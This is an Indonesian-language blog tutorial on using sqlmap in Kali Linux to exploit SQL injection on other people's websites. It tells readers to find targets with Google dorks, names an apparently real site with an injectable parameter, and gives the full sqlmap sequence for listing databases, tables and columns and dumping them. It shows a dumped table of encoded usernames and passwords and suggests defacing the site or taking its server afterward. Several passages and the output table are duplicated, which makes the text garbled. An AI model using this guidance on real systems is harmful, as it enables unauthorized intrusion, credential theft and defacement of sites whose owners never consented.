Tutorial Sql Injection Dengan SQLMAP Kali Linux - SQL Injection merupakan
sebuah
teknik hacking dimana seorang penyerang dapat memasukkan
perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter,jadi
hacker dapat dengan mudah mendapatkan data dari website targetnya.
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
oke setelah melihat tentang penjelasan tersebut kita akan langsung coba praktekan oke Tutorial Sql Injection Dengan SQLMAP Kali Linux
Tutorial Sql Injection Dengan SQLMAP Kali Linux
pertama yang harus anda lakukan adalah mencari target website yang vuln sql injection dengan menggunakan dork dibawah ini,copy paste dork ni di google
lalu setelah mendapatkan target kita coba tambahkan tanda ' pada ujung
addres bar website target disini saya mempunyai website dengan bug sql
injection yaitu http://www.woodbridgeparty.com/products.php?id=111 setelah itu saya coba tambahkan tanda petik di ujung angka 111 seperti ini http://www.woodbridgeparty.com/products.php?id=111'
maka akan ada error berarti web itu vuln sql injection dan kita bisa
lanjutakan tahap berikutnya yaitu menginject bug tersebut dengan sqlmap
setelah itu buka terminal dan masukan perintah berikut :
sqlmap -u http://website-target.com/contoh.php?id=1 --dbs silahkan ganti website target sesuai website yang kita inject yang memiliki bug sql injection seperti diatas
setalah itu tekan enter dan tunggu sampai sqlmap mendapatkan informasi database target proses ini kira kira sekitar 5 menit tergantu koneksi anda, setelah selesai kita akan mendapatkan database target maka langkah selanjutnya menampilkan tables database tersebut denga perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase --tables
setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables --columns
sqlmap -u http://website-target.com/contoh.php?id=1 --dbs silahkan ganti website target sesuai website yang kita inject yang memiliki bug sql injection seperti diatas
setalah itu tekan enter dan tunggu sampai sqlmap mendapatkan informasi database target proses ini kira kira sekitar 5 menit tergantu koneksi anda, setelah selesai kita akan mendapatkan database target maka langkah selanjutnya menampilkan tables database tersebut denga perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase --tables
setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables --columns
tunggu beberapa
saat sampai sqlmap menampilkna data columns dari tables databas web
tersebut setelah mendapatkan columns database tersebut langkah terakhir
kita hanya perlu men dump data columns tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump
tunggu beberapa
saat sampai sqlmap berhasil mendump data columns database tersebut
setelah selesai maka kita akan mendapatkan data web tersebut
dan akhirnya kita mendapatkan user dan pass web tersebut
+--------------------------+----------------------------------+
| uname | upass |
+-------------------------+-----------------------------------+
| js7Xzco= | jN/O193KyA== |
| k9bIzMrTxw== | k9bIzMrTx6PU0A== |
+-------------------------+-----------------------------------+
| uname | upass |
+-------------------------+-----------------------------------+
| js7Xzco= | jN/O193KyA== |
| k9bIzMrTxw== | k9bIzMrTx6PU0A== |
+-------------------------+-----------------------------------+
tinggal kita
kembangkan lagi sesuai keinginan kita contoh nya kita ingin dump table
lain kita tinggal ganti nama tables nya dan kesananya sama saja setelah
sampai tahap ini tinggal kita cari halaman admin web tersebut terserah
deh web itu mau di apain ntah itu di deface di ambil server nya dan lain
lain saya di sini cuman share ilmu yang saya miliki saja selebihnya
jika di salahgunakan itu bukan tanggung jawab saya . sekian Tutorial Sql Injection Dengan SQLMAP Kali Linux kali ini semoga bermanfaat
Terimakasih
Sumber:http://kalilinuxindo.blogspot.com/2014/06/tutorial-sql-injection-dengan-sqlmap.html
0 komentar:
Posting Komentar